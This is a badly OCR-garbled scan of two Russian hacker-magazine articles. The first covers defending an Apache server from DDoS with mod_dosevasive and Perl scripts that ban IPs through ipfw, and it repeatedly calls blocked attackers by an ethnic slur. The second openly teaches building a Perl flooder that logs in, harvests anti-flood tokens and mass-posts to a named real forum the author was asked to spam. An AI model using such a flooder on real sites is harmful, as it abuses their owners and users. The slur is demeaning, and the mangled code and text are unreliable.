[столкновение с проблемой] Однажды, имея достаточно крупный 
ресурс на попечении, я столкнулся с серьезной проблемой. Кто-то зака- 
зал масштабную ООоЗ-атаку на мой проект. Симптомы нападения были 
налицо: при обращении к ѵѵеЬ-сайту Апач дико тормозил и возвращал 
контент лишь через десять минут. При заходе в консоль демон ззИб во- 
обще не отвечал на мои запросы. Сперва я подумал, что произошла ка- 
кая-то фигня на сервере, и попросил мой датацентр перезагрузить ма- 
шину (сайт проекта располагался на выделенном сервере в ІІЗА). Пос- 
ле внеплановой перезагрузки с горем пополам мне все-таки удалось 
войти в консоль. Что я там увидел — не описать словами. Процессор 
был загружен на 100%, а показатель І_оасІ Оѵегаде достигал 160. Стои- 
ло мне убить процесс НПрсІ, как машинка ожила, и загрузка мигом сни- 
зилась до нуля. Стало ясно, что боты бомбят запросами ѴѴѴѴѴѴ-сервис. 
Проблему нужно было как-то решать, и только тогда я понял, что раци- 
ональных методов защиты от ООоЗ не существует. 

Многие авторы в своих статьях рекомендуют обратиться к провайдеру и 
попросить администрацию использовать фаервол на определенные ІР- 
адреса на вышестоящем брандмауэре. Эта идея хороша тем, что юзеру 
вообще не нужно париться насчет нападений, однако прием работает не 
всегда. Когда я написал администрации датацентра об атаке, те просто 
пожали плечами и ответили, что ничего делать не собираются. Мол, у 
тебя есть свой файрвол, вот и обороняйся сам. Кстати сказать, подоб- 
ную политику ведут многие хостинги и центры. С виду, ситуация выгля- 
дела неизбежной, но нужно было что-то предпринять, ведь оставаться 
без денег я тоже не хотел. 



[модульная защита] С головой окунувшись в инет, я пытался найти 
средство защиты от ООоЗ. Казалось бы, под потоком левых запросов нахо- 
дился всего один сервис, значит, решение проблемы должно быть где-то на 
поверхности. На одном из ресурсов, я обнаружил ссылку на модуль для 
АрасПе под названием тосМозеѵазіѵе. По словам разработчика, данный 
плагин позволяет защититься от крупномасштабной атаки, если последняя 
нацелена на АрасПе. Мне предстояло это проверить. Я скачал сам модуль 
по ссылке уѵуѵ\л/.писІеагеІеріпапі.сот/рго}есіз/сіозеѵазіѵе/тосі_сіозеѵа- 
зіѵе_1.10.іаг.дг и достаточно быстро поставил его на сервер. Оставалось 
лишь отконфигурировать ГіПрсІ.соггі и забыть о проблемах. По крайней ме- 
ре, так писалось в ВЕАЭМЕ к модулю :). 

В конфиг Апача мною было добавлено несколько строк: 

[добавка в ІШрб.сопІ] 

<ІТМосІиІе тосЦіозеѵазіѵе.о 
ЭОЗНазІіТаЫеЗііе 3097 
ЭОЗРадеСоипІ 2 
ЭОЗЗНеСоипІ 50 
ЭОЗРадеІпІегѵаІ 1 
ООЗЗіІеІпІегѵаІ 1 

ЭОЗЗузІетСоттапсІ "есііо %з » /ѵаг/Іод/піддегг" 

</ІТМосІиІе> 

Для большего понимания давай рассмотрим подробнее вышеописанные 
строки. В первой строке инициализируется размер так называемой хэш- 
таблицы, которая обрабатывает запросы к ѴѴѴѴѴѴ-серверу. Затем распо- 
лагаются счетчики запросов к одной странице и ко всему сайту. Интер- 







Чтобы включить файрвол, 
необходимо выполнить ко- 
манду зузсб -и/ 
пеі.іпеі.ір.і\л/.епаЫе=1 . Но 
не забывай, что во ВгееВЗО 
политикой по умолчанию 
является Оепу, поэтому пе- 
ред активацией файрвола 
нужно добавить правило 
іріѵѵ абб 65000 аііош ір 
ігот апу іо апу. 



вал обращения по умолчанию ра- 
вен одной секунде — это видно из 
последующих директив. Таким об- 
разом, если кто-то обратился к од- 
ной странице трижды за одну се- 
кунду, ІР-адрес неприятеля будет 
заблокирован. Тот же самый ре- 
зультат произойдет в случае мно- 
гократного обращения (50 попыток 
в секунду) к любой странице сайта. 

Однако по умолчанию модуль 
просто возвращает ошибку 403 
после блокировки. Даже в этом 
случае при масштабной атаке наг- 
рузка на сервер может быть очень 
большой. Чтобы избежать подоб- 
ного, я настроил модуль на прос- 
тое добавление адреса в блэк-лист 
/ѵаг/іод/піддегг с последующей об- 
работкой этого файла специаль- 
ным скриптом. Следовало учитывать, что операция записи происходит с 
правами поЬосІу, поэтому необходимо установить атрибут 666 на файл. 
Итак, система была настроена, и оставалось лишь запустить ГШрсІ. Как 
и ожидалось, после старта в списке злобных ниггеров стали появляться 
первые ІР-адреса. Но почему-то там их было не так много, как я предпо- 
лагал. Каждую минуту через сгопІаЬ запускался специальный скрипт, 




На нашем замечательном 
диске ты как всегда най- 
дешь все исходники 
скриптов, которые были 
описаны в этой статье, а 
также упомянутый модуль 
для Апача. 



ПОХОЖИЕ ФАЙРВОЛЫ 

Если ты счастливый обладатель І_іпих, то переделать 
скрипты не составит особого труда. Следует лишь вместо 
ірТѵѵ использовать файрвол ірІаЫез. Однако нужно пом- 
нить, что слово зеіир, которое отвечает за тип ЕЗТАВ- 
ЫЗНЕО-соединения, должно быть заменено на конструк- 
цию -т зіаіе -зіаіе ЕЗТАВЫЗНЕО. 

Следует также внедрить механизм сохранения правил 
после перезагрузки. Здесь существует два варианта — 
либо пользоваться сервисными командами (наподобие, 
/зЬіп/зегѵісе іріаЫез заѵе), либо заносить правило в спи- 
сок вручную. При последнем приеме не забывай, что 
список правил ІрІаЫез обычно хранится 
в /еІс/зузсопІід/ірІаЫез. 



который загонял в бан все адреса, накопившиеся в листе, а затем обну- 
лял этот список. Все вроде бы работало, но особого эффекта не дава- 
ло. Система также тормозила, а ИПрсІ вообще перестал инициализиро- 
вать новые соединения. 

[не знаешь сам — спроси товарища] Поиски каких-либо решений в Се- 
ти оказались тщетными. На форумах проблема ООоЗ практически не обсуж- 
далась, а если о ней и говорили, то готовых солюшенов никто не предлагал. 
Ничего не оставалось, как спросить знакомых админов по ІСО. Один из них 
поделился со мной замечательным скриптом, который впоследствии и нато- 
лкнул меня на разработку собственных методов защиты от коварных атак. 
Сценарий был написан на языке РегІ и не отличался особой слож- 
ностью. Каждую минуту он вызывался по крону и при запуске смотрел 
результат выполнения команды пеізіаі -апіідгер ЕЗТАВЫЗНЕО. Затем 
устанавливался какой-то предел соединений. Если данный лимит был 
превышен, ІР-адрес заносился в черный список файрвола. Таким обра- 
зом, мой товарищ не раз защищался от масштабной атаки. 
Поблагодарив админа, я решил установить этот сценарий в мою систе- 
му. После небольшой переделки, скрипт был готов к использованию и 
выглядел примерно так: 

[простой скрипт для защиты от ОйоЗ] 

#!/изг/Ьіп/регІ 

@оиІриІ='пеІ5ІаІ -апіідгер ЕЗТАВЫЗНЕОІаѵѵк '{ргіпІ(\$4,\$5)Г; 
$агд=$АР6Ѵ[0]; 

ТогеасИ $1іпе (@ои!риІ) { 
сИотр($Ііпе); 

$Ііпе=~/(.*\..*\..*\..*)\..* (.*\..*\..*\..*)\..7; 

$сІеѵз{ , 63.33.33.33 , }="зі50"; 

$згс{$2}=$сІеѵ5{$1 }; 

$ірз{$2}=$ірз{$2}+1; 

} 

ТогеасИ $ір (зогі кеуз %ірз) { 

ІІ ($5ГС{$Ір}) { 

ІІ ($агд ед '0') { ргіпі "($згс{$ір}) $ір => $ірз{$ір}\п"; } 

ІІ ($ірз{$ір} > 7) { 

сііотр($сІаІе='сіаІе +’%сІ.%т.%у %Н:%М:%3 '); 
ореп(Т, "»/ѵаг/Іод/аІІаск.Іод"); 
ргіпі I "$сІаІе -> аііаск/зсап Ігот $ір [$ірз{$ір}]\п"; 
сіозе I; 

зу з1:е т ("/з Ь і п/і рТѵѵ -д асісі 13 сіепу ір Ігот $ір Іо те"); 

Ш 



[ХАКЕР 09 [81] 05 > ВЗЛОМ 067 ] 



[хакер 09 [81] 05 > ВЗЛОМ 068 ] 



Думаю, в этом коде ты сможешь разобраться и 
без дополнительных комментариев. Тем более, 
что работу сценария я уже описал. Лимит сое- 
динений в моем случае был равным семерке. 
Помимо основной функции, скрипт выводит 
статистику соединений, чтобы администратор 
знал, кто в данный момент его атакует :). 



[изучаем журналы] Но и этот прием не дал 
стопроцентной защиты от атаки. Через пару ча- 
сов показатель нагрузки реально снизился на 
40%, пач перестал тормозить, но все равно 
чувствовалось, что атака продолжается. Причем, 
надо отметить, что стандартный файрвол успеш- 
но справлялся с натиском неприятеля, просто су- 
ществовали какие-то специальные боты, кото- 
рым удавалось обходить хитроумный скрипт. 

И я обнаружил этих ботов всего за несколько 
минут :). Для этого мне пришлось включить оп- 
цию ѵегЬозе в моем файрволе ірТѵѵ. Это делает- 
ся простой командой зузсіі -ѵѵ пеі.іпеі.ір.іѵѵ.ѵег- 
Ьозе=1 . Затем я создал небольшое правило, об- 
рабатывающее все пакеты. Данный рулес дол- 
жен опережать по номеру правило, которое зап- 
рещает весь трафик на машину. Я выбрал в качестве идентификатора 
число 50000. Сама команда добавления выглядела следующим образом: 

ірТѵѵ асШ 50000 соипТ Іод ІодатоипТ 0 ір Ігот апу Іо те 80 

Теперь можно было приступить к анализу файла /ѵаг/іод/зесигііу. Туда 
по умолчанию, стали записываться все обращения к серверу на 80 порт. 
Немного переделав вышеописанный сценарий, я стал перечитывать 
фиксированный фрагмент лога (командой ІаіІ -1000 /ѵаг/іод/зесигііу) и 
брать оттуда число обращений. Результат не заставил себя долго ждать 
— всего после 2-3 запусков нагрузка на сервер вновь упала. 

Но подобным методом нельзя было защититься на все 100%, потому как 
за время своей работы скрипт уже успел забанить 20-30 легальных по- 
сетителей ресурса :). Это объясняется тем, что обычный пользователь 
при определенных условиях вполне может превысить мой лимит обра- 
щений (при обновлении страницы или при слабом канале). 
Вышеописанной защитой я пользовался три дня. За это время, как я уже го- 
ворил, в бане файрвола накопилось порядка сотни добропорядочных поль- 
зователей. Запускать сценарий приходилось три-четыре раза в день. Подоб- 
ная защита, несомненно, действовала, но доверять ей на все сто процентов 
было нельзя. Поэтому я решил разработать новый вариант протекта против 
□ЭоЗ-атаки. В этом мне очень помогла система журналирования АрасГіе. 
Мне захотелось посмотреть на запросы, которые боты посылают ѴѴѴѴѴѴ- 
серверу. Как оказалось практически все реквесты были одинаковыми и не- 
отличимыми от пользовательских. На первый взгляд в запросе фигуриро- 
вал Веіегег, правильно оформленное обращение на рандомную, но сущест- 
вующую страницу, и реальный ІІзегАдепІ Однако последнее поле застави- 
ло меня усомниться в правильности запроса. В большинстве залогирован- 
ных строк, ІІзегАдепІ имел префикс ѴѴіп 98.x. Видимо, это и была един- 
ственная отличительная черта обычных реквестов от вражеских. В моей го- 
лове уже родился план новой защиты сервера от ботов. И уже через 1 5 ми- 
нут я его реализовал в виде компактного РегІ-сценария. Г рех не привести 
его исходный код, потому как многим администраторам он пригодится. 

[регі-скрипт, спасающий от ОЭоЗ] 

#!/изг/Ьіп/регІ 

$пит='саІ/ѵаг/Іод/гиІе'; # В этом файле хранится номер правила 
сііотр $пит; 

$стсІ=ЧаіІ -1 000 /изг/ІосаІ/арасИе/Іодз/ассезз.ІодІдгер ѴѴіп 9х 4.ІсиІ -II 
-сі ІзогІ -и 1 ; # Выгребаем последние 1000 записей с шаблоном, выре- 
заем из нее ІР-адрес и убиваем дубликаты 
@стсІ='$стсГ; 
сііотр @стсІ; 

ТогеасИ $еасб (@стф { 
сііотр $еас!і; 

$шІе=0; 
сііотр $гиІе; 

ореп(ОВ,"/ѵаг/Іод/піддег 2 "); 

\л/Ы1е(<0В>) { 

іі (/$еасіі/) { $шІе=1 ; Ьгеак } # Если адрес уже есть в базе — завершаем работу 
} 

сІозе(ОВ); 




ядерные настройки 
файрвола 




собираем почтовые 
адреса 



ипіезз ($гиІе) { 

5у5Іет("/зЬіп/ірІѵѵ асШ $пит сіепу ір Ігот $еасіі Іо те 80"); # В против- 
ном случае — заносим ІР в блэк-лист 
ореп(106,"»/ѵаг/Іод/сІоз.Іод"); 
ргіпі 1_06 "ЬаппесІ ір $еасИ аз гиіез $пит\п"; 
сІозе(Юб); 

ореп(ОВ,"»/ѵаг/Іод/піддег 2 "); 

ргіпі ЭВ "$еасІі\п"; # И добавляем запись в лог и в базу ниггеров :). 
сІозе(ОВ); 

$пит++; 

}} 

есПо $пит > /ѵаг/іод/гиіе'; # Обновляем номер правила 

Этот сценарий парсит журнал на предмет отличительных запросов, выделя- 
ет из них ір-адрес, а затем ищет аналогичный айпишник в специальной ба- 
зе. Если адрес не найден, значит, его нет в правилах ірТѵѵ, следовательно, он 
там незамедлительно появляется :). В противном случае, ір бота уже был за- 
банен, поэтому сценарий не засоряет файрвол повторным правилом. 
Скрипт апіісісіоз.рі запускается через сгопіаЬ каждую минуту. Этого вполне 
хватает, чтобы отразить атаку 2-3 тысяч ботов, как было в моем случае. Един- 
ственный минус в работе сценария заключается в том, что он не может быст- 
ро восстановить работоспособность сервера. Иными словами, при излишне 
активной атаке (20-30 запросов в один момент времени), сервер все равно 
уходит в анабиозное состояние, но возвращается из него через 3-4 минуты :). 

[админ спит, атака идет] Если ты думаешь, что я поставил сценарий 
и забыл о ботах, то ошибаешься :). Несмотря на то, что за трафик я не 
платил (а боты нагоняли в день около 500 мегабайт мусора), я захотел 
справедливости. Поэтому моей задачей было отписать в аЬизе всем пеі- 
ѵѵогк-администраторам тех сетей, на которых крутились боты, тем самым 
разрушив ботнет. В течение часа с помощью команды ѵѵГюіз, ЬазГі-евых 
средств автоматизации и какой-то матери :), я собрал почтовые адреса 
на 90% ботов. Моя задача упрощалась тем, что в большинстве случаях 
атака велась из одной подсети. Таким образом, мне понадобилось напи- 
сать всего 400 жалоб, чтобы сообщить обо всех уязвимых машинах. За- 
дача была выполнена всего за три часа, и уже через день я получил доб- 
рую половину ответов от админов, которые обещали обезвредить зараз- 
ную машину. Всего через неделю поток флуда на мой сервер полностью 
прекратился. Видимо, ботмастер понял, что со мной опасно иметь дело, 
или заказчик флуда перестал платить деньги за атаку. В любом случае, 
я одержал победу над злодеями, чему до сих пор очень рад. 

Мораль басни такова: даже если тебя атакуют несколько тысяч ботов, а 
вышестоящий провайдер отказывается помогать, действуй самостоя- 
тельно. В статье я привел несколько готовых решений по защите от са- 
мых опасных атак, твоя задача — выбрать оптимальный вариант. Если 
ты платишь за трафик и не один вариант тебя не устраивает, попробуй 
сменить датацентр на более дружелюбный, где заботятся о каждом кли- 
енте, или хотя бы не берут деньги за трафик :) © 



КОМПЕТЕНТНОЕ МНЕНИЕ 

Большинство БРоЗ-атак базируется на особенностях ра- 
боты протокола ТСР/ІР, в частности, на способе обработки 
входящих пакетов с флагом ЗѴІ\І. Эти атаки достаточно 
сложно предотвратить, особенно, если система подразу- 
мевает общедоступные входящие соединения. Также ос- 
ложняет борьбу с такими атаками тот факт, что они, как 
правило, проводятся со множества адресов, зачастую на- 
ходящихся в разных сегментах Сети и принадлежащих 
разным операторам связи. Поэтому какого-то стопроцент- 
ного способа борьбы с нападениями попросту не сущест- 
вует. На данный момент самое действенное средство 
борьбы с этим типом атак — это контроль со стороны опе- 
ратора связи, который должен обеспечивать их быстрое 
обнаружение и блокирование этого трафика на входе в 
свой сегмент сети. Операторы связи пытаются предотвра- 
щать подобные атаки путем установки фильтров, которые 
отсекают такой трафик в автоматическом режиме. Осо- 
бенно эта практика распространена у зарубежных опера- 
торов связи. Причем зачастую от действия таких фильт- 
ров страдают обычные пользователи, так как достаточно 
сложно отличить трафик ООоЗ-атаки от некоего приложе- 
ния, устанавливающего одновременно несколько соедине- 
ний с каким-либо узлом. Краснов Алексей . Системный ад- 
министратор компании Медиател (ѵѵѵѵѵѵ.тесііаіеі.ги) 
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Не стоит забывать, что все действия хакера противозаконны, поэтому данная статья дана лишь для ознакомления и организации правильной защиты с твоей стороны. 
За применение материала в незаконных целях, автор и редакция ответственности не несут. 




ѴѴЕВ-наводнение 

НЕОТЪЕМЛЕМОЙ ЧАСТЬЮ «ЗАЩИТЫ ИНФОРМАЦИИ» 
ЯВЛЯЕТСЯ ЗАЩИТА ѴѴЕВ-КОНТЕНТА. ПОЭТОМУ ВЕБ- 
МАСТЕРЫ ДОЛЖНЫ НЕ ТОЛЬКО УМЕТЬ ГРАМОТНО 
УПРАВЛЯТЬ САЙТОМ, НО И УМЕТЬ ЕГО ЗАЩИЩАТЬ ОТ 
РАЗНОЙ НЕЧИСТИ, ВРОДЕ СКРИПТИДДИСОВ И ФЛУДЕ- 
РОВ, КОТОРЫХ СЕЙЧАС РАЗВЕЛОСЬ ПОЛНЫМ ПОЛНО 
В СЕТИ. СЕГОДНЯ МЫ ПОБУДЕМ В РОЛИ ПЛОХИХ ПАР- 
НЕЙ. ВМЕСТЕ МЫ РАССМОТРИМ ОСНОВЫ ПРОЦЕССА 
ЗАФЛУЖИВАНИЯ ѴѴЕВ-ПРИЛОЖЕНИЙ. УЗНАЕМ ТОН- 
КОСТИ АВТОМАТИЗАЦИИ «НАВОДНЕНИЯ» НА ПРИМЕРЕ 
САМОПАЛЬНОГО ФОРУМНОГО ДВИЖКА И НАПИШЕМ 
ДЛЯ НЕГО СВОЙ ПОЛНОФУНКЦИОНАЛЬНЫЙ ФЛУДЕР. 

ИТАК, ПРИСТУПИМ! I Александр Любимов ака ЗазЫкз ( геаІ_ззІпх@таіІ.ги ) 



Учимся флудить неприятельские форумы 

[первые шаги] Давай для начала разберемся, как работает, к примеру, эле- 
ментарная гостевая книга. Чтобы не говорить слишком абстрактно, я рассмот- 
рю стандартный прототип гостевухи, который состоит из следующих частей: 
Ш Скрипт для отображения сообщений (дЬ/іпсІех.рНр) 

\2\ Форма для отправления сообщений в книгу (дЬ/Тгот.МтІ) 

[з] Скрипт для записи нового сообщения в гостевую {дЬ/зсгірі.рНр) 

То есть, если ты хочешь оставить свою запись в чьей-нибудь гостевой 
книге, то поочередно обращаешься к следующим документам: 
Іогт.ИІтІ (забиваем наши данные) -» асІсЦпезз.рІір (наши данные пере- 
даются скрипту для записи в БД или файл) -» іпбех.рПр (теперь здесь 
будет отображаться наш коммент к гостевой книге). 

Чтобы понять, каким образом можно засыпать приложение левыми 
сообщениями, давай посмотрим, как выглядит стандартная форма 
для отправки сообщения: 




Если диск к журналу похи- 
тили инопланетяне, пол- 
ную версию флудера ка- 
чай отсюда: ШрУ/ипіх- 
Іогде. огд/~5зШх/хрсот_1о 
гит_ІІообегМ :). 




На нашем диске лежит 
полная и законченная 
версия Іогит_ІІообег'а, 
описанного в этой статье. 



[среднестатистическая форма для отправки сообщения] 

сіогт асІіоп=5СгірІрІпр теШосІ=РОЗТ> 

Имя:<Ьг> 

сіпріЛ 1уре=1ех1 пате="уоиг_пате" ></><Ьг> 

Адрес е-таіІ:<Ьг> 

сіпріЛ 1уре=1ех1 пате="етаіІ" ></><Ьг> 

Твой комментарий:<Ьг> 

сіехіагеа пате="1ехГ го\л/з=1 0 соіз=65 > 

сЛехІагеахЬгхЬг> 

сіпріЛ Іуре=ЗиЬтіІ > 

</Тогт> 

Как только ты нажмешь на кнопку ЗиЬтіІ, данные тут же передадутся сер- 
верному приложению при помощи РОЗТ-запроса, внутри сценария созда- 
дутся переменные $_РОЗТ[уоиг_пате], $_Р05Т[етаіІ], $_РОЗТ[1ех1] и эти 
данные запишутся в базу данных или текстовый файл. 

А теперь представь на секунду, что будет, если начать методично нажимать 
сігі+г, отправляя на сервер все новые и новые сообщения, заполнив таким 
образом за пару минут гостевую книгу десятками сообщений. Чтобы не до- 
пустить такого поворота событий, сейчас все скрипты оборудованы той или 
иной защитой от флуда и такая элементарная атака не проходит. 

Сейчас мы научимся обходить некоторые защиты и, самое главное, 
автоматизируем процесс флуда. Как? Конечно же с помощью любимо- 
го скриптового языка — РегІ. 





[собираем паучка] Допустим, ты хотел заполнить гостевуху своего 
недруга сотней-другой веселых и полезных сообщений. Разумеется, 
этот процесс было бы неплохо поставить на конвейер. Для этого нам 
нужно наколбасить перловый сценарий, который будет сам заходить на 
страницу и оставлять сообщение. РегІ-скрипт может работать с ѵѵеЬ че- 
рез сокеты, но намного легче использовать специально заточенный для 
этих целей модуль І_ѴѴР (ІіЬгагу ѴѴѴѴѴѴ Іог РегІ). Он должен быть прикру- 
чен к перлу по умолчанию. Вот как будет выглядеть примитивный флу- 
дер для нашей многострадальной гостевой: 

[примитивный флудер] 

#!/изг/Ьіп/регІ 
изе ШР::11зегАдеп1; 

изе НТТР::ВедиезІ;#этот модуль нам необходим, чтобы создавать 
«запросы» вида ( метод=>"урл" ); 

$игІ="\л/\л/\л/.зоЬакоІіпеѴзсгірІр[ір"; 

$пате="ЗазЫкз";#это наши данные, которые будут отправляться 
$етаіІ="геаІ_зз[іх@таіІ.ги"; 

$ІехІ="Это не флуд! 

$орега=1\А/Р::11зегАдеп1->пе\А/();#создаем новый объект — браузер; 
$гед=пе\л/ 

НТТР::Ведие5І(РОЗТ=>"$игІ?уоиг_пате=$пате&етаіІ=$етаіІ&ІехЬ$1 
ехІ");#создаем новый запрос 

$орега -» гедиезІ($гед);#выполняем запрос, то есть отправку данных 
скрипту 

ргіпГМеззаде асШесІІѴГ; 

После запуска этого скрипта в гесте должна появиться наша запись. 
Чтобы отправить больше сообщений, можно просто добавить цикл, где 
счетчиком будет число необходимых тебе сообщений. Правда просто? 
Кстати, в РегІ есть еше один модуль из семейства НТТР. Он создан спе- 
циально, если тебе нужно часто работать с ѵѵеЬ-формами. Подключает- 
ся он так: изе НТТР::Ведиез1::Соттоп, а запрос из предыдущего приме- 
ра реализуется следующим образом: 

$^е^=РОЗТ( , ^л/^л/^л/.5оЬакоТТ.пе1:/5С^ір1:.р^^р , , [уоиг_пате=>'$пате', 
етаіІ=>'$етаіГ, ІехІ=>'$ІехІ'] ); 



тѵѵѵ.Ііпихзискз.огд мы будем писать нашу программу. Сейчас я расскажу, 
как я изучал этот форумный движок. Первым делом я, конечно же, заре- 
гался и зашел в раздел сіізсиззіопз. Сайт был построен на рГір (хотя фай- 
лы и были замаскированы апачем под Мііті). Я выбрал произвольный то- 
пик и стал смотреть сообщения в нем. В самом конце списка ответов бы- 
ла кнопочка АбсІВерІу. После нажатия меня перебросило к форме для от- 
вета на пост. Ничего особенного в ней не было — поле для темы, тексто- 
вое поле и кнопка для отправки РозЬ Я заполнил поля какой-то лабудой 
и нажал на Розі, но тут надпись на кнопке изменилась на что-то, вроде 
«Подождите. Идет обработка» (сама кнопка стала теперь неактивной), 
и лишь потом мне вывели новую страницу и сообщили, что ответ успешно 
записан. Мне стало интересно, смогу ли я вернуться и запостить сообще- 
ние заново, поэтому в браузере я перешел на страницу назад. Все поля 
были заполнены и не очистились, но еше раз запостить этот ответ я не мог, 
потому что кнопка Розі так и оставалась неактивной. Вот это первый вид 
защиты от флудеров. Теперь я решил оставить еще один ответ, и как толь- 
ко мне сообщили, что сообщение добавлено, я тут же вернулся к тому то- 
пику и опять нажал АбсІВерІу и увидел форму для ответа. Я быстренько ее 
заполнил и нажал Розі Но теперь на загрузившейся страничке, вместо 
ожидаемого «Ответ успешно записан», появилось предупреждение о том, 
что запрещено оставлять более одного сообщения в минуту. Как видишь, 
еще один прием защиты от попадания в форум всякого мусора. Что ж, для 
начала неплохо, но я знал, что в форме должен был быть еще какой-то 
трюк, чтоб защититься от флудеров. Так и оказалось. Если просмотреть 
Гііті-код страницы, то можно увидеть несколько скрытых полей, в которых 
передавались параметры, среди которых были ІорісІШе (название темы), 
розіісі (Ю номер топика) и некий неизвестный параметр Іокеп. А вот на нем 
я хочу остановиться поподробнее. Лично мне он напомнил М05 хэш: <іпри1 
Іуре="ІпісІсІеп" пате=Іокеп ѵаІие="95ІссЗЬаЯ27се6с2сЗе7аШЗОЗЬ7сЬ І, >. 

Так, скорее всего, и было (причем я заметил, что хэш генерировался каж- 
дый раз новый и не от чего не зависел). То есть при генерировании ѵѵеЬ-фор- 
мы для ответа на пост в нее вставляется сгенеренный хэш, 
и как только мы жмем кнопку Розі, то скрипт, которому передаются парамет- 
ры, сравнивает значение, переданное ему в $1океп, с тем, что было вставле- 
но в форму. Если же значения не совпадают, то ответ просто-напросто не 
записывается. Немного почесав репу, я понял, что для создания флудера 
под форум, этих данных будет мало. Мне нужно было знать все значения (в 
том числе и в скрытых полях), которые передавались из формы. Для этого 
мне нужно было сохранить форму на себе на винт и в ПІтІ-коде исправить: 



ЗАЩИЩАЙТЕСЬ, СУДАРЬ! 

Существуют много способов защиты ѵѵеЬ-приложений от по- 
добного рода ЯоосІ-атак. Это и скрытые таблицы и генерация 
произвольного кода в теле страницы. Сюда также относится ІР 
блокировка, шифрование с помощью баѵаЗсгірЪ Вообще, при- 
меров много, и все они заслуживают твоего внимания. Очень 
подробную и интересную статью по этому поводу написал ЗаісІ 
в последнем (№3) выпуске Макака Е-гіпе. Настоятельно ре- 
комендую почитать этот материал. 



ЗАЧЕМ ЭТО НУЖНО? 

В самом деле, кому и зачем может понадобиться флудер? Ну 
во-первых, его можно использовать в корыстных целях: рекла- 
мировать что-нибудь, пиарить свой сайт, обливать грязью сво- 
его друга Петровича и так далее. Можно признаться в любви, 
поздравить маму с днем рождения, довести админов до белого 
каления. Но самое главное — помни, что грамотно реализо- 
вать защиту со своей стороны, можно лишь с головой погру- 
зившись в проблему нападения. 



Здесь в квадратных скобках мы просто присвоили необходимым пара- 
метрам соответствующие значения. 

[копаем глубже] Разобравшись с основами «затопления» вражеских 
гестбуков можно перейти к более интересному занятию — изучению фо- 
румов и разработки полноценного автономного флудера. Между прочим, 
за это дело я взялся не зря. А все потому, что мой британский друг Кайл 
(фанатик юниксов), однажды забрел на сайт тѵѵѵ.Ііпихзискз.огд, где ему 
очень не понравилось тамошнее отношение наглых буржуев к детищу Ли- 
нуса Торвальдса (да и никсам вообще). Так как сайт по сути представлял 
собой один большой форум, я тут же получил задание сделать им какую- 
нибудь пакость — например, до опупения залить их топиками, вроде КіІІ 
ВіІІ(ОаІез) :). Вот такая вот прелюдия. Теперь на примере 

ЫщА 
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<Іогт опЗиЬтіІ="5иЬтіІопсе(ІЫ5)" асІіоп= м /асісіВерІу.!іІтГ 
теШосІ="РОЗТ" епсІуре="тиШрагІ/Іогт-сІаІа"> 
на 

<Іогт опЗиЬтіІ="5иЬтіІопсе(ІЫз)" 

ас^іоп=Фир://\л/\л/\л/.Iіпиx5иск5.о^д/асIсіВерIу.^^^тГ , теШос1="6ЕТ" епс- 
Іуре="тиШрагѴІогт-с]аІа"> 




пример формы для отправки комментариев в гостевую 



форма для постинга сообщений на ѵѵѵѵѵѵ. Ііпихзискз.огд 



[ХАКЕР 09 [81] 05 > ВЗЛОМ 071 ] 
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наш флудер в работе 



То есть в асііоп я прописал полный путь к скрипту, а метод передачи 
заменил на (ЗЕТ. Теперь, нажав на Роз*, страница начнет передавать 
на сервер данные, но теперь методом (ЗЕТ, поэтому в адресной строке 
браузера я смогу увидеть все параметры. Вот как выглядела эта строка: 

\А/\д/\л/.Ііпихзиск8.огд/асІсіВерІу.[іІтІ?хІШе=название_нашего отве- 
та&розІіс]=это_номер топика&іорісІШе=название_самого_топи- 
ка&хт8д=наш_ответ&Ро8І=РозІ&Іокеп=это_тсІ5_хэш&тосіе=ЗиЬтіІ 

Параметры роз* и тобе не менялись в зависимости от топика. Теперь, 
получив все необходимые сведения, я уже мог начинать писать флудер. 

[перловые забавы] Перед тем, как приступить непосредственно к 
написанию, нужно определиться с тем, какие действия и в каком поряд- 
ке должна выполнять наша программа: 

Ш Аутентификация на сайте (логин+пароль) 

\ 2 \ Получение Соокіез 

[з] Получение страницы с формой (парсинг параметров) 

0 Составление запроса (плюс Соокіез) 

[б] Отправка запроса 

Сейчас мы разберем каждый пункт. Первое, что нам нужно сделать — 
пройти авторизацию с помощью пары «логин:пароль». Если этого не сде- 
лать, то при запросе страницы с формой нас все равно перебросит на па- 
гу Іодіп.Гі*тІ. Благо авторизация выполнена крайне просто в виде двух по- 
лей, поэтому, чтобы нас впустили, достаточно проделать следующие: 

$орега=І_ѴѴР::ІІзегАдеп1: -> п е\л/(); 

$гед=пе\л/ 

НТТР::ВедиезІ(РОЗТ=>"[іНр:/М\л/ѵѵ.Ііпихзискз.огд/Іодіп.ІіІтІ?хІодіп=$и 

8ег&хра88\А/огсі=$разз"); 

$гезропзе=$орега -» гедиезІ($гед);Я подразумеваю, что юзер заре- 
ган, и логин с пассом валидны. После этого нам должны выдаться 
куки. Но как их сохранить для дальнейшего использования? Для 
этого нам нужно подключить модуль изе НТТ::Соокіез. Вот основ- 
ные методы для объектов: 

$соокіе_]аг=НТТР::Соокіез -» пе\л/(); #мы создаем псевдо БД, где будут 
храниться печенья. Кода сессия заканчиваеться, БД опустошаеться. 
$соокіе_]аг -» ехІгасІ_соокіез($гезропзе); #Из полученного браузе- 
ром ответа (см. выше) мы извлекаем кукис и кладем его в нашу БД 
$соокіе_]аг -> асІс]_соокіе_беас]ег($гедиезІ); #Присоединяем наш 
файл соокіе к запросу $гедиезІ (об этом далее). 

То есть после авторизации приходит ответ сервера, в котором мы полу- 
чаем Соокіез. Эту куку бережно сохраняем в $соокіе^г, ведь она нам 
позже пригодится (к слову, нам ее нужно цеплять к каждому запросу). 
А сейчас нам надо получить ГігтІ-код страницы с формой для ответа. До- 
пустим, если ты хочешь наводнить топик с Ю 1500, то это будет выгля- 
деть примерно так: 

$гед=пе\л/ 

НТТР::ВедиезІ(6ЕТ=>"бІф://\л/\л/\л/.Ііпихзискз.огд/асІсІРерІу.[іІтІ?розІісІ= 

1500"); 

$соокіе_]аг -» абсІ_соокіе_ІіеасІег($гед);/ вот здесь мы прикрепляем 
кукис, который получили при авторизации 
$гезропзе=$орега -> гедиезІ($гед); 

$гезр_сопІ=$гезропзе ->соп!епІ; 



Сейчас в переменной $гезр_соп* должна храниться вся страница с фор- 
мой для реплая. Мы получили ее, чтобы найти скрытые параметры та- 
кие, как *океп и *оріс*і*Іе. Если же мы не узнаем их значение, то не смо- 
жем запостить ответ. Пропарсив страницу, мы получили необходимые 
данные, и теперь готовы отправить запрос с нашим ответом: 

$ІІоос1_розІ=пеѵѵ 

